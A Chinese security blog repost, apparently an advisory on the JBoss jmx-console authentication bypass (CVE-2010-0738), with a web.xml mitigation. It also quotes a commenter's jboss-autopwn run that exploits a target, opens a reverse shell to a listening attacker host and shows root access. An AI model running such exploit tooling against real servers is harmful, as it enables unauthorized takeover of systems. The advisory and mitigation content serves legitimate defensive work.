当前位置: 首页 > 工具软件 > JBoss Autopwn > 使用案例 >

JBoss企业应用平台多个非授权访问漏洞

岳研
2023-12-01

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Chris said...
Got this working with JBoss-autopwn :-D

Screenshot below..

[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080
[x] Checking if authentication is enabled..
[!] Authentication enabled!
[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass
[!] Is this a *nix based or Windows based JBoss instance? nix
[!] Which IP should I send the reverse shell to? 192.168.1.2
[!] Which port should I send the reverse shell to? 6669
[x] *nix based selected...
Connection from 192.168.1.3 port 6669 [tcp/*] accepted
[!] you should now have a shell on 192.168.1.2:6669
[root@foo jboss-autopwn]# fg 1
nc -lv 6669
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
^C
[root@foo jboss-autopwn]#

建议:


临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 修改访问配置,阻止其他的HTTP访问方式。

修改 web.xml 文件,默认位于 server/default/deploy/jmx-console.war/WEB-INF/ 目录下:

------------------------------- 8< -------------------------------
   <!-- A security constraint that restricts access to the HTML JMX console
   to users with the role JBossAdmin. Edit the roles to what you want and
   uncomment the WEB-INF/jboss-web.xml/security-domain element to enable
   secured access to the HTML JMX console.
   <security-constraint>
     <web-resource-collection>
       <web-resource-name>HtmlAdaptor</web-resource-name>
       <description>An example security config that only allows users with the
         role JBossAdmin to access the HTML JMX console web application
       </description>
       <url-pattern>/*</url-pattern>
       <http-method>GET</http-method>
       <http-method>POST</http-method>
       <http-method>HEAD</http-method>     <------- 增加此行
     </web-resource-collection>
     <auth-constraint>
       <role-name>JBossAdmin</role-name>
     </auth-constraint>
   </security-constraint>
   -->
------------------------------- 8< -------------------------------

厂商补丁:

RedHat
 

















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/438848,如需转载请自行联系原作者

 类似资料: